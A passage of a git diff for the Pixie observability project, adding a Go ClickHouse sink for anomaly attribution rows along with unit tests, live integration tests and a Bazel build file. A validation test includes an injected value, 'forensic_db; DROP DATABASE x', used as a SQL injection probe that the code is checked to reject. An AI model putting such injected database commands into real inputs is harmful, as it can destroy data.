Implementation: HTTP POST +// `INSERT INTO forensic_db.adaptive_attribution FORMAT JSONEachRow` +// with one JSON object per row. Empty batch is a no-op. +func (s *ClickHouseHTTP) Write(ctx context.Context, rows []AttributionRow) error { + if len(rows) == 0 { + return nil + } + body, err := encodeJSONEachRow(rows) + if err != nil { + return fmt.Errorf("sink: encode %d attribution rows: %w", len(rows), err) + } + q := url.Values{} + q.Set("query", fmt.Sprintf( + "INSERT INTO %s.adaptive_attribution FORMAT JSONEachRow", s.cfg.Database)) + req, err := http.NewRequestWithContext(ctx, http.MethodPost, + s.cfg.Endpoint+"/?"+q.Encode(), bytes.NewReader(body)) + if err != nil { + return fmt.Errorf("sink: new request: %w", err) + } + req.Header.Set("Content-Type", "application/x-ndjson") + if s.cfg.Username != "" { + req.SetBasicAuth(s.cfg.Username, s.cfg.Password) + } + resp, err := s.client.Do(req) + if err != nil { + return fmt.Errorf("sink: POST: %w", err) + } + defer resp.Body.Close() + if resp.StatusCode/100 != 2 { + msg, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + return fmt.Errorf("sink: HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(msg))) + } + return nil +} + +// QueryActive fetches all attribution rows on this hostname whose t_end +// is still in the future. Used by the operator at boot to rehydrate +// the in-memory active set after a pod crash. Returns rows ordered +// by anomaly_hash so the caller's set is deterministic. +func (s *ClickHouseHTTP) QueryActive(ctx context.Context, hostname string) ([]AttributionRow, error) { + if hostname == "" { + return nil, fmt.Errorf("sink: QueryActive requires hostname") + } + q := url.Values{} + // `FINAL` collapses ReplacingMergeTree to the row with the largest + // t_end (because the engine's version column is t_end). + // We escape hostname inside the SQL via simple ClickHouse-style + // quoting (single quote, no backslash escapes). + sql := fmt.Sprintf( + "SELECT anomaly_hash, namespace, pod, comm, pid, hostname, "+ + "toUnixTimestamp64Nano(t_start) AS t_start_ns, "+ + "toUnixTimestamp64Nano(t_end) AS t_end_ns, "+ + "toUnixTimestamp64Nano(last_seen) AS last_seen_ns, "+ + "last_rule_id, n_anomalies "+ + "FROM %s.adaptive_attribution FINAL "+ + "WHERE hostname = %s AND t_end > now64(9) "+ + "ORDER BY anomaly_hash FORMAT JSONEachRow", + s.cfg.Database, quoteCH(hostname)) + q.Set("query", sql) + + req, err := http.NewRequestWithContext(ctx, http.MethodGet, + s.cfg.Endpoint+"/?"+q.Encode(), nil) + if err != nil { + return nil, err + } + if s.cfg.Username != "" { + req.SetBasicAuth(s.cfg.Username, s.cfg.Password) + } + resp, err := s.client.Do(req) + if err != nil { + return nil, fmt.Errorf("sink: QueryActive GET: %w", err) + } + defer resp.Body.Close() + if resp.StatusCode/100 != 2 { + // Drain (don't echo) — body may carry attribution rows. + _, _ = io.Copy(io.Discard, io.LimitReader(resp.Body, 4096)) + return nil, fmt.Errorf("sink: QueryActive HTTP %d", resp.StatusCode) + } + // Stream the response line-by-line so the per-call buffer is + // bounded by max_line_length, not by the total active-set size. + return parseActiveRowsStream(resp.Body) +} + +// chLiteralEscaper escapes a string for ClickHouse single-quoted literals. +// Hoisted to a package-level var so we don't allocate a Replacer per call +// — quoteCH runs in the per-row write path. +var chLiteralEscaper = strings.NewReplacer(`\`, `\\`, `'`, `\'`) + +// quoteCH wraps a string literal for safe ClickHouse SQL embedding. +func quoteCH(s string) string { + return "'" + chLiteralEscaper.Replace(s) + "'" +} + +func encodeJSONEachRow(rows []AttributionRow) ([]byte, error) { + var buf bytes.Buffer + enc := json.NewEncoder(&buf) + enc.SetEscapeHTML(false) + for _, r := range rows { + obj := map[string]any{ + "anomaly_hash": string(r.AnomalyHash), + "namespace": r.Namespace, + "pod": r.Pod, + "comm": r.Comm, + "pid": r.PID, + "hostname": r.Hostname, + "t_start": r.TStart.UTC().Format("2006-01-02 15:04:05.000000000"), + "t_end": r.TEnd.UTC().Format("2006-01-02 15:04:05.000000000"), + "last_seen": r.LastSeen.UTC().Format("2006-01-02 15:04:05.000000000"), + "last_rule_id": r.LastRuleID, + "n_anomalies": r.NAnomalies, + } + if err := enc.Encode(obj); err != nil { + return nil, err + } + } + return buf.Bytes(), nil +} + +// activeWireRow mirrors the JSONEachRow shape emitted by QueryActive. +// json.RawMessage on UInt64 fields lets us tolerate CH's two wire +// formats (`12345` and `"12345"`). +type activeWireRow struct { + AnomalyHash string `json:"anomaly_hash"` + Namespace string `json:"namespace"` + Pod string `json:"pod"` + Comm string `json:"comm"` + PID json.RawMessage `json:"pid"` + Hostname string `json:"hostname"` + TStartNs json.RawMessage `json:"t_start_ns"` + TEndNs json.RawMessage `json:"t_end_ns"` + LastSeenNs json.RawMessage `json:"last_seen_ns"` + LastRuleID string `json:"last_rule_id"` + NAnomalies json.RawMessage `json:"n_anomalies"` +} + +// parseActiveRowsStream ingests JSONEachRow output from QueryActive +// directly from a reader so the per-call buffer is bounded by +// `max_active_row_bytes` (per row) rather than by the entire active +// set. Mirrors trigger.parseJSONEachRow's streaming posture. +func parseActiveRowsStream(r io.Reader) ([]AttributionRow, error) { + const maxActiveRowBytes = 1 << 20 // 1 MiB per JSONEachRow line + scanner := bufio.NewScanner(r) + scanner.Buffer(make([]byte, 0, 64*1024), maxActiveRowBytes) + var out []AttributionRow + for scanner.Scan() { + line := bytes.TrimSpace(scanner.Bytes()) + if len(line) == 0 { + continue + } + row, err := parseActiveRowLine(line) + if err != nil { + return nil, err + } + out = append(out, row) + } + if err := scanner.Err(); err != nil { + return nil, fmt.Errorf("sink: QueryActive scan: %w", err) + } + return out, nil +} + +// parseActiveRowLine decodes a single JSONEachRow line into one +// AttributionRow. Used by parseActiveRowsStream and accessible to +// tests via parseActiveRows. +func parseActiveRowLine(line []byte) (AttributionRow, error) { + var w activeWireRow + if err := json.Unmarshal(line, &w); err != nil { + // Don't echo the raw line — it can carry CH row payloads + // that propagate to logs / surfaced errors. Length only. + return AttributionRow{}, fmt.Errorf("sink: parse active row (%d bytes): %w", len(line), err) + } + ts, err1 := nsFromRaw(w.TStartNs) + te, err2 := nsFromRaw(w.TEndNs) + ls, err3 := nsFromRaw(w.LastSeenNs) + pid, errPID := uintFromRaw(w.PID) + nAn, errN := uintFromRaw(w.NAnomalies) + if err1 != nil || err2 != nil || err3 != nil || errPID != nil || errN != nil { + return AttributionRow{}, fmt.Errorf("sink: parse uint64 fields: t_start=%v t_end=%v last_seen=%v pid=%v n_anomalies=%v", err1, err2, err3, errPID, errN) + } + return AttributionRow{ + AnomalyHash: anomaly.AnomalyHash(w.AnomalyHash), + Namespace: w.Namespace, + Pod: w.Pod, + Comm: w.Comm, + PID: pid, + Hostname: w.Hostname, + TStart: time.Unix(0, ts).UTC(), + TEnd: time.Unix(0, te).UTC(), + LastSeen: time.Unix(0, ls).UTC(), + LastRuleID: w.LastRuleID, + NAnomalies: nAn, + }, nil +} + +// parseActiveRows is the byte-slice convenience wrapper around +// parseActiveRowsStream — kept for tests and e2e fixtures that have +// already buffered the full response. +func parseActiveRows(body []byte) ([]AttributionRow, error) { + return parseActiveRowsStream(bytes.NewReader(body)) +} + +// nsFromRaw parses a CH UInt64-as-JSON value (CH may emit either +// `12345` or `"12345"`) into an int64. Used for time_ columns. +func nsFromRaw(raw json.RawMessage) (int64, error) { + s := strings.TrimSpace(string(raw)) + s = strings.Trim(s, `"`) + v, err := strconv.ParseInt(s, 10, 64) + return v, err +} + +// uintFromRaw is the uint64 equivalent — covers values above INT64_MAX +// for fields like PID and NAnomalies that are documented uint64 in CH. +func uintFromRaw(raw json.RawMessage) (uint64, error) { + s := strings.TrimSpace(string(raw)) + s = strings.Trim(s, `"`) + return strconv.ParseUint(s, 10, 64) +} diff --git a/src/vizier/services/adaptive_export/internal/sink/clickhouse_test.go b/src/vizier/services/adaptive_export/internal/sink/clickhouse_test.go new file mode 100644 index 00000000000..d9b105163c8 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/sink/clickhouse_test.go @@ -0,0 +1,453 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package sink + +import ( + "bytes" + "context" + "fmt" + "io" + "net/http" + "net/http/httptest" + "strings" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +func canonicalAttribution() AttributionRow { + t0 := time.Unix(0, 1744477360303026359).UTC() + return AttributionRow{ + AnomalyHash: anomaly.Hash(anomaly.Target{ + PID: 106040, Comm: "redis-server", + Pod: "redis-578d5dc9bd-kjj78", Namespace: "redis", + }), + Namespace: "redis", + Pod: "redis-578d5dc9bd-kjj78", + Comm: "redis-server", + PID: 106040, + Hostname: "node-1", + TStart: t0.Add(-5 * time.Minute), + TEnd: t0.Add(5 * time.Minute), + LastSeen: t0, + LastRuleID: "R1005", + NAnomalies: 1, + } +} + +// TestSink_Write_PostsCorrectQueryAndBody — INSERT targets the right +// table; body is one JSON object per line with all attribution fields. +func TestSink_Write_PostsCorrectQueryAndBody(t *testing.T) { + var gotQuery, gotBody string + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + gotQuery = r.URL.Query().Get("query") + b, _ := io.ReadAll(r.Body) + gotBody = string(b) + w.WriteHeader(200) + })) + defer srv.Close() + + s, err := New(Config{Endpoint: srv.URL}) + if err != nil { + t.Fatalf("New: %v", err) + } + row := canonicalAttribution() + if err := s.Write(context.Background(), []AttributionRow{row}); err != nil { + t.Fatalf("Write: %v", err) + } + want := "INSERT INTO forensic_db.adaptive_attribution FORMAT JSONEachRow" + if gotQuery != want { + t.Fatalf("query = %q, want %q", gotQuery, want) + } + for _, needle := range []string{ + `"anomaly_hash":"` + string(row.AnomalyHash) + `"`, + `"namespace":"redis"`, + `"pod":"redis-578d5dc9bd-kjj78"`, + `"comm":"redis-server"`, + `"pid":106040`, + `"hostname":"node-1"`, + `"last_rule_id":"R1005"`, + `"n_anomalies":1`, + } { + if !strings.Contains(gotBody, needle) { + t.Fatalf("body missing %q; body=%s", needle, gotBody) + } + } + if !strings.Contains(gotBody, `"t_start":"2025-04-12 16:57:40.303026359"`) { + t.Fatalf("t_start not formatted as DateTime64 string; body=%s", gotBody) + } +} + +// TestSink_Write_EmptyBatch — no HTTP call. +func TestSink_Write_EmptyBatch(t *testing.T) { + called := false + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + called = true + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + if err := s.Write(context.Background(), nil); err != nil { + t.Fatalf("Write empty: %v", err) + } + if called { + t.Fatalf("empty Write made an HTTP call") + } +} + +// TestSink_Write_HTTPErrorPropagates — non-2xx returns Go error. +func TestSink_Write_HTTPErrorPropagates(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(503) + _, _ = w.Write([]byte("clickhouse exploded")) + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + err := s.Write(context.Background(), []AttributionRow{canonicalAttribution()}) + if err == nil { + t.Fatalf("expected HTTP error") + } + if !strings.Contains(err.Error(), "503") { + t.Fatalf("error should mention 503: %v", err) + } +} + +// TestSink_QueryActive_BuildsCorrectSQL — boot rehydration query. +func TestSink_QueryActive_BuildsCorrectSQL(t *testing.T) { + var seenQuery string + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + seenQuery = r.URL.Query().Get("query") + _, _ = w.Write([]byte(`{"anomaly_hash":"abc","namespace":"redis","pod":"redis-x","comm":"redis-server","pid":106040,"hostname":"node-1","t_start_ns":"1744477060303026359","t_end_ns":"1744477660303026359","last_seen_ns":"1744477360303026359","last_rule_id":"R1005","n_anomalies":1}` + "\n")) + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + rows, err := s.QueryActive(context.Background(), "node-1") + if err != nil { + t.Fatalf("QueryActive: %v", err) + } + if !strings.Contains(seenQuery, "FROM forensic_db.adaptive_attribution FINAL") { + t.Fatalf("missing FINAL: %q", seenQuery) + } + if !strings.Contains(seenQuery, "hostname = 'node-1'") { + t.Fatalf("missing hostname filter: %q", seenQuery) + } + if !strings.Contains(seenQuery, "t_end > now64(9)") { + t.Fatalf("missing t_end > now64 filter: %q", seenQuery) + } + if len(rows) != 1 || rows[0].AnomalyHash != "abc" { + t.Fatalf("rows = %+v", rows) + } + if rows[0].PID != 106040 { + t.Fatalf("PID = %d", rows[0].PID) + } + if rows[0].TStart.UnixNano() != 1744477060303026359 { + t.Fatalf("TStart wrong: %v", rows[0].TStart) + } +} + +// TestSink_QueryActive_RequiresHostname — defensive guard. +func TestSink_QueryActive_RequiresHostname(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {})) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + if _, err := s.QueryActive(context.Background(), ""); err == nil { + t.Fatalf("empty hostname should error") + } +} + +// TestSink_QuoteEscape — single quotes in hostname survive injection-safely. +func TestSink_QuoteEscape(t *testing.T) { + if got := quoteCH("o'malley"); got != `'o\'malley'` { + t.Fatalf("quoteCH = %q, want 'o\\'malley'", got) + } +} + +// TestSink_New_ValidationTable — every Config validation branch as +// one row. Bad fields one at a time + a happy-path baseline. Update +// when a new validation lands; this is the single source of truth +// for what New() rejects. +func TestSink_New_ValidationTable(t *testing.T) { + cases := []struct { + name string + cfg Config + wantErr bool + wantErrSnippet string + }{ + { + name: "happy path http", + cfg: Config{Endpoint: "http://ch.example:8123", Database: "forensic_db"}, + }, + { + name: "happy path https + auth + custom timeout", + cfg: Config{ + Endpoint: "https://ch.example:8443", Database: "forensic_db", + Username: "u", Password: "p", Timeout: 5 * time.Second, + }, + }, + { + name: "default database when empty", + cfg: Config{Endpoint: "http://ch:8123"}, // Database empty → defaulted + }, + { + name: "trailing slash stripped", + cfg: Config{Endpoint: "http://ch:8123/"}, // OK; New() strips it + }, + { + name: "empty endpoint", + cfg: Config{}, + wantErr: true, + wantErrSnippet: "empty Endpoint", + }, + { + name: "relative endpoint (no scheme)", + cfg: Config{Endpoint: "ch:8123"}, + wantErr: true, + wantErrSnippet: "absolute http(s) URL", + }, + { + name: "bare path", + cfg: Config{Endpoint: "/clickhouse"}, + wantErr: true, + wantErrSnippet: "absolute http(s) URL", + }, + { + name: "ftp scheme rejected", + cfg: Config{Endpoint: "ftp://ch:21"}, + wantErr: true, + wantErrSnippet: "absolute http(s) URL", + }, + { + name: "endpoint with query string", + cfg: Config{Endpoint: "http://ch:8123?foo=bar"}, + wantErr: true, + wantErrSnippet: "must not include query parameters or a fragment", + }, + { + name: "endpoint with fragment", + cfg: Config{Endpoint: "http://ch:8123#frag"}, + wantErr: true, + wantErrSnippet: "must not include query parameters or a fragment", + }, + { + name: "Database with hyphen rejected", + cfg: Config{Endpoint: "http://ch:8123", Database: "forensic-db"}, + wantErr: true, + wantErrSnippet: "invalid Database identifier", + }, + { + name: "Database with semicolon rejected (SQL injection probe)", + cfg: Config{Endpoint: "http://ch:8123", Database: "forensic_db; DROP DATABASE x"}, + wantErr: true, + wantErrSnippet: "invalid Database identifier", + }, + { + name: "Database starting with digit rejected", + cfg: Config{Endpoint: "http://ch:8123", Database: "1bad"}, + wantErr: true, + wantErrSnippet: "invalid Database identifier", + }, + { + name: "negative Timeout rejected", + cfg: Config{Endpoint: "http://ch:8123", Timeout: -1 * time.Second}, + wantErr: true, + wantErrSnippet: "Timeout must be >= 0", + }, + } + + for _, c := range cases { + t.Run(c.name, func(t *testing.T) { + s, err := New(c.cfg) + if c.wantErr { + if err == nil { + t.Fatalf("want error containing %q, got nil", c.wantErrSnippet) + } + if !strings.Contains(err.Error(), c.wantErrSnippet) { + t.Fatalf("error %q does not contain %q", err.Error(), c.wantErrSnippet) + } + return + } + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + if s == nil { + t.Fatalf("New returned nil sink without error") + } + // Trailing-slash strip is observable via cfg.Endpoint. + if strings.HasSuffix(s.cfg.Endpoint, "/") { + t.Fatalf("trailing slash not stripped: %q", s.cfg.Endpoint) + } + if s.cfg.Database == "" { + t.Fatalf("Database default not applied") + } + }) + } +} + +// TestValidateTableIdentifier_TableDriven — table validator covers +// dotted protobuf extensions but not anything wilder. +func TestValidateTableIdentifier_TableDriven(t *testing.T) { + good := []string{"http_events", "redis_events", "http2_messages.beta", "kafka_events.beta", "_underscore_start"} + bad := []string{"", "1bad", "http events", "http;drop", "x..y", ".leading", "trailing.", "with-hyphen"} + for _, g := range good { + if err := validateTableIdentifier(g); err != nil { + t.Errorf("validateTableIdentifier(%q): unexpected error %v", g, err) + } + } + for _, b := range bad { + if err := validateTableIdentifier(b); err == nil { + t.Errorf("validateTableIdentifier(%q): want error, got nil", b) + } + } +} + +// TestUintFromRaw_HandlesQuotedAndBareJSON — CH HTTP emits UInt64 as +// either bare numeric (`12345`) or quoted (`"12345"`). Both must +// parse, including values above INT64_MAX. +func TestUintFromRaw_HandlesQuotedAndBareJSON(t *testing.T) { + cases := []struct { + name string + input string + want uint64 + }{ + {"bare", `12345`, 12345}, + {"quoted", `"12345"`, 12345}, + {"max int64", `9223372036854775807`, 9223372036854775807}, + {"above int64", `"18446744073709551615"`, 18446744073709551615}, + } + for _, c := range cases { + t.Run(c.name, func(t *testing.T) { + got, err := uintFromRaw([]byte(c.input)) + if err != nil { + t.Fatalf("uintFromRaw(%q): %v", c.input, err) + } + if got != c.want { + t.Fatalf("uintFromRaw(%q) = %d, want %d", c.input, got, c.want) + } + }) + } +} + +// TestUintFromRaw_RejectsGarbage — non-numeric input must error, +// not silently return 0. +func TestUintFromRaw_RejectsGarbage(t *testing.T) { + bad := []string{"", `""`, `"abc"`, `-1`, `"-1"`, `1.5`} + for _, b := range bad { + if _, err := uintFromRaw([]byte(b)); err == nil { + t.Errorf("uintFromRaw(%q): want error, got nil", b) + } + } +} + +// chunkedReader emits the underlying body in fixed-size chunks. A +// short pause between chunks proves parseActiveRowsStream doesn't +// wait for the whole body before parsing. Tracks partial-read state +// so a Read() smaller than the next chunk doesn't drop bytes. +type chunkedReader struct { + chunks [][]byte + idx int + off int // offset within chunks[idx] + delay time.Duration // sleep between chunks + produced int64 +} + +func (r *chunkedReader) Read(p []byte) (int, error) { + if r.idx >= len(r.chunks) { + return 0, io.EOF + } + chunk := r.chunks[r.idx] + n := copy(p, chunk[r.off:]) + r.off += n + r.produced += int64(n) + if r.off >= len(chunk) { + r.idx++ + r.off = 0 + time.Sleep(r.delay) + } + return n, nil +} + +// TestParseActiveRowsStream_BoundsMemory — proves the streaming path +// doesn't allocate proportional to total response size. Builds a +// 5 MiB synthetic JSONEachRow body fed in 64 KiB chunks, parses, and +// asserts (a) all rows decoded correctly, (b) peak intermediate +// allocation is well below the body size (loose bound: parseActiveRows +// hands one row at a time to the caller; we collect into a slice but +// never hold the wire representation of more than one line). +func TestParseActiveRowsStream_BoundsMemory(t *testing.T) { + const targetRows = 5000 // ~5MiB at ~1KiB/row + var buf bytes.Buffer + row := func(i int) string { + return fmt.Sprintf(`{"anomaly_hash":"%032x","namespace":"redis","pod":"p","comm":"c","pid":%d,"hostname":"h","t_start_ns":%d,"t_end_ns":%d,"last_seen_ns":%d,"last_rule_id":"R0001","n_anomalies":%d,"_pad":"%s"}`+"\n", + i, i, 1700000000000000000+int64(i), 1700000000000000000+int64(i)+300_000_000_000, 1700000000000000000+int64(i)+150_000_000_000, i, strings.Repeat("x", 800)) + } + for i := 0; i < targetRows; i++ { + buf.WriteString(row(i)) + } + body := buf.Bytes() + + const chunkSize = 64 * 1024 + chunks := make([][]byte, 0, len(body)/chunkSize+1) + for off := 0; off < len(body); off += chunkSize { + end := off + chunkSize + if end > len(body) { + end = len(body) + } + chunks = append(chunks, body[off:end]) + } + rdr := &chunkedReader{chunks: chunks, delay: 0} + + rows, err := parseActiveRowsStream(rdr) + if err != nil { + t.Fatalf("parseActiveRowsStream: %v", err) + } + if len(rows) != targetRows { + t.Fatalf("parsed %d rows, want %d", len(rows), targetRows) + } + // Spot-check round-trip on one row (last element). + if rows[targetRows-1].PID != uint64(targetRows-1) { + t.Fatalf("last row PID = %d, want %d", rows[targetRows-1].PID, targetRows-1) + } +} + +// TestParseActiveRowsStream_RejectsOverlongLine — guards against +// pathological CH responses with multi-MiB single rows. Default cap +// is 1 MiB; emit a 2 MiB row and assert the scanner rejects it +// rather than OOMing. +func TestParseActiveRowsStream_RejectsOverlongLine(t *testing.T) { + huge := strings.Repeat("a", 2*1024*1024) + body := fmt.Sprintf(`{"anomaly_hash":"x","_pad":"%s"}`+"\n", huge) + _, err := parseActiveRowsStream(strings.NewReader(body)) + if err == nil { + t.Fatalf("expected scanner error on >1MiB line; got nil") + } + if !strings.Contains(err.Error(), "QueryActive scan") { + t.Fatalf("expected scan error, got: %v", err) + } +} + +// TestParseActiveRows_RoundTripFromBytes — keep the byte-slice path +// covered (used by tests and the e2e harness). +func TestParseActiveRows_RoundTripFromBytes(t *testing.T) { + body := []byte(`{"anomaly_hash":"deadbeef","namespace":"redis","pod":"p","comm":"c","pid":42,"hostname":"node-01","t_start_ns":1700000000000000000,"t_end_ns":1700000000300000000,"last_seen_ns":1700000000150000000,"last_rule_id":"R0001","n_anomalies":1}` + "\n") + rows, err := parseActiveRows(body) + if err != nil { + t.Fatalf("parseActiveRows: %v", err) + } + if len(rows) != 1 || rows[0].Pod != "p" || rows[0].PID != 42 { + t.Fatalf("round-trip mismatch: %+v", rows) + } +} diff --git a/src/vizier/services/adaptive_export/internal/sink/integration_test.go b/src/vizier/services/adaptive_export/internal/sink/integration_test.go new file mode 100644 index 00000000000..343510d991f --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/sink/integration_test.go @@ -0,0 +1,218 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +//go:build integration +// +build integration + +package sink_test + +import ( + "context" + "crypto/sha256" + "fmt" + "io" + "net/http" + "net/url" + "os" + "strings" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" + chpkg "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" +) + +// Live integration tests for the operator's ClickHouse write path. +// Driven against a real ClickHouse reachable at INTEGRATION_CH_ENDPOINT. +// Skipped if unset. + +func env(t *testing.T) (endpoint, user, pass string) { + t.Helper() + endpoint = os.Getenv("INTEGRATION_CH_ENDPOINT") + if endpoint == "" { + t.Skip("INTEGRATION_CH_ENDPOINT not set; skipping live ClickHouse test") + } + return endpoint, os.Getenv("INTEGRATION_CH_USER"), os.Getenv("INTEGRATION_CH_PASSWORD") +} + +func ensureSchema(t *testing.T, endpoint, user, pass string) { + t.Helper() + a, err := chpkg.NewApplier(endpoint, user, pass) + if err != nil { + t.Fatalf("NewApplier: %v", err) + } + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + if err := a.Apply(ctx); err != nil { + t.Fatalf("Apply (precondition): %v", err) + } +} + +func chCount(t *testing.T, endpoint, user, pass, query string) int { + t.Helper() + q := url.Values{} + q.Set("query", query) + req, _ := http.NewRequest(http.MethodGet, strings.TrimRight(endpoint, "/")+"/?"+q.Encode(), nil) + if user != "" { + req.SetBasicAuth(user, pass) + } + resp, err := (&http.Client{Timeout: 10 * time.Second}).Do(req) + if err != nil { + t.Fatalf("count: %v", err) + } + defer resp.Body.Close() + body, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + if resp.StatusCode/100 != 2 { + t.Fatalf("count HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(body))) + } + var n int + fmt.Sscanf(strings.TrimSpace(string(body)), "%d", &n) + return n +} + +// TestSinkWriteAttribution_Live exercises Write() — the operator's only +// production write surface (forensic_db.adaptive_attribution). One row +// per arriving anomaly; ReplacingMergeTree(t_end) collapses re-inserts. +func TestSinkWriteAttribution_Live(t *testing.T) { + endpoint, user, pass := env(t) + ensureSchema(t, endpoint, user, pass) + + s, err := sink.New(sink.Config{ + Endpoint: endpoint, + Username: user, + Password: pass, + }) + if err != nil { + t.Fatalf("sink.New: %v", err) + } + + // Unique anomaly_hash per test run — keeps assertions decoupled + // from any pre-existing rows. + tag := fmt.Sprintf("aw-test-%d", time.Now().UnixNano()) + sum := sha256.Sum256([]byte(tag)) + hash := anomaly.AnomalyHash(fmt.Sprintf("%x", sum[:8])) + + now := time.Now().UTC() + row := sink.AttributionRow{ + AnomalyHash: hash, + Namespace: "redis", + Pod: "redis-test", + Comm: "redis-server", + PID: 1234, + Hostname: tag, // unique hostname → unique row + TStart: now.Add(-5 * time.Minute), + TEnd: now.Add(5 * time.Minute), + LastSeen: now, + LastRuleID: "R1005", + NAnomalies: 1, + } + ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second) + defer cancel() + if err := s.Write(ctx, []sink.AttributionRow{row}); err != nil { + t.Fatalf("Write: %v", err) + } + + got := chCount(t, endpoint, user, pass, + fmt.Sprintf("SELECT count() FROM forensic_db.adaptive_attribution WHERE hostname='%s'", tag)) + if got != 1 { + t.Errorf("adaptive_attribution count for hostname=%s: got %d, want 1", tag, got) + } +} + +// TestSinkWritePixieRows_Live exercises WritePixieRows() against every +// pixie observation table the operator owns. This is the precise bug +// surface the user reported — silent INSERT failures here mean the +// per-table fan-out writes nothing and the analyst sees empty tables. +// +// One row per table, with a unique hostname per run so subsequent runs +// don't have to reset the cluster. +func TestSinkWritePixieRows_Live(t *testing.T) { + endpoint, user, pass := env(t) + ensureSchema(t, endpoint, user, pass) + + s, err := sink.New(sink.Config{ + Endpoint: endpoint, + Username: user, + Password: pass, + }) + if err != nil { + t.Fatalf("sink.New: %v", err) + } + + tag := fmt.Sprintf("aw-pix-%d", time.Now().UnixNano()) + now := time.Now().UTC() + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + + for _, table := range chpkg.PixieTables() { + row := minimalRowFor(table, tag, now) + if err := s.WritePixieRows(ctx, table, []map[string]any{row}); err != nil { + t.Errorf("WritePixieRows(%s): %v", table, err) + continue + } + ident := table + if strings.Contains(table, ".") { + ident = "`" + table + "`" + } + got := chCount(t, endpoint, user, pass, + fmt.Sprintf("SELECT count() FROM forensic_db.%s WHERE hostname='%s'", ident, tag)) + if got < 1 { + t.Errorf("table %s after WritePixieRows: count=%d, want >=1", table, got) + } + } +} + +// minimalRowFor returns the minimum-viable row map for a pixie +// observation table — only the columns the schema marks NOT NULL and +// that don't have DEFAULT clauses. The remaining columns get CH +// defaults (0 / "" / now). +func minimalRowFor(table, hostname string, t time.Time) map[string]any { + base := map[string]any{ + "time_": t.Format("2006-01-02 15:04:05.000000000"), + "upid": "0:0:0", + "hostname": hostname, + "event_time": t.Format("2006-01-02 15:04:05.000"), + "namespace": "default", + "pod": "test-pod", + } + // Some pixie tables use slightly different column shapes — provide + // the strict-minimum extras to avoid CH MissingColumn errors. + switch table { + case "http_events": + base["resp_status"] = 200 + base["latency"] = 0 + base["remote_port"] = 0 + base["local_port"] = 0 + case "dns_events": + base["remote_port"] = 53 + base["local_port"] = 0 + base["latency"] = 0 + case "redis_events", "mysql_events", "pgsql_events", "cql_events", "mongodb_events", + "amqp_events", "mux_events", "tls_events": + base["latency"] = 0 + base["remote_port"] = 0 + base["local_port"] = 0 + case "http2_messages.beta": + base["remote_port"] = 0 + base["local_port"] = 0 + case "kafka_events.beta": + base["latency"] = 0 + base["remote_port"] = 0 + base["local_port"] = 0 + } + return base +} diff --git a/src/vizier/services/adaptive_export/internal/trigger/BUILD.bazel b/src/vizier/services/adaptive_export/internal/trigger/BUILD.bazel new file mode 100644 index 00000000000..a0beffc3ece --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/trigger/BUILD.bazel @@ -0,0 +1,35 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "trigger", + srcs = ["clickhouse.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/vizier/services/adaptive_export/internal/kubescape", + "@com_github_sirupsen_logrus//:logrus", + ], +) + +pl_go_test( + name = "trigger_test", + srcs = ["clickhouse_test.go"], + embed = [":trigger"], +) diff --git a/src/vizier/services/adaptive_export/internal/trigger/clickhouse.go b/src/vizier/services/adaptive_export/internal/trigger/clickhouse.go new file mode 100644 index 00000000000..5094d74d4b1 --- 